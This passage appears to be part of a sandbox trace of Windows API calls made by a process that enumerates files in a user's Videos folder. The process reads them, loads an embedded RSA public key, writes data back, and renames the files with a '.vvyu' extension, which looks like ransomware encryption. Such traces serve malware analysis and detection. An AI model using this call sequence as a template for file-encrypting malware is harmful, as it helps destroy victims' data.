(HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea2a8 | out: hHeap=0x2c0000) returned 1 [0196.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.393] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9b2d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9b2d, lpOverlapped=0x0) returned 1 [0196.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.394] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9b32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.394] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.395] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.396] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.396] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.396] CloseHandle (hObject=0x584) returned 1 [0196.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0196.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.398] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\Jf9T9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\jf9t9.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\Jf9T9.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\jf9t9.mp4.vvyu")) returned 1 [0196.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.400] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0196.403] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12ac7f00, ftCreationTime.dwHighDateTime=0x1d89cc3, ftLastAccessTime.dwLowDateTime=0x534d2e10, ftLastAccessTime.dwHighDateTime=0x1d89f1b, ftLastWriteTime.dwLowDateTime=0x534d2e10, ftLastWriteTime.dwHighDateTime=0x1d89f1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M fZX23r02sYWxh", cAlternateFileName="MFZX23~1")) returned 1 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae8fa8 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b7d8 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae9020 [0196.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae9098 [0196.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0196.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0196.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0196.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0196.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0196.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0196.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f30 | out: hHeap=0x2c0000) returned 1 [0196.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae8f30 [0196.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0196.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0196.407] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e9fe40, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x700bfd20, ftLastAccessTime.dwHighDateTime=0x1d89eb6, ftLastWriteTime.dwLowDateTime=0x700bfd20, ftLastWriteTime.dwHighDateTime=0x1d89eb6, nFileSizeHigh=0x0, nFileSizeLow=0xd14d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OPCtfBG3jGTa hU3.mkv", cAlternateFileName="OPCTFB~1.MKV")) returned 1 [0196.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0196.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0196.408] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\OPCtfBG3jGTa hU3.mkv") returned=".mkv" [0196.408] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\OPCtfBG3jGTa hU3.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\opctfbg3jgta hu3.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.408] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=53581) returned 1 [0196.408] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.413] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd127, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.413] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.416] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.416] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd14d, lpOverlapped=0x0) returned 1 [0196.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.417] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b640) returned 1 [0196.419] CryptCreateHash (in: hProv=0x31b640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.419] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.419] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.419] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.419] GetLastError () returned 0x0 [0196.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.419] GetLastError () returned 0x0 [0196.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.420] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.420] CryptReleaseContext (hProv=0x31b640, dwFlags=0x0) returned 1 [0196.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.420] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.420] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.420] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd150) returned 0x2af5168 [0196.421] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea2a8 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea2f0 [0196.422] 